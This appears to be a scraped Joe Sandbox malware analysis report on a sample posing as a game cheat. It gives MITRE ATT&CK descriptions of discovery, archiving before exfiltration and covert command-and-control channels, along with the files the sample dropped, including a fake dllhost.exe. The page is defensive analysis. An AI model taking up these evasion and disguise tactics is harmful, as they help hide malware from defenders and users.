Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SpeedHack666Cheat (no VM detected).exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ClickMe.exe

C:\ClickMe.exe:Zone.Identifier

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\dllhost.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\SpeedHack666Cheat (no VM detected).exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dllhost.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
SpeedHack666Cheat (no VM detected).exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre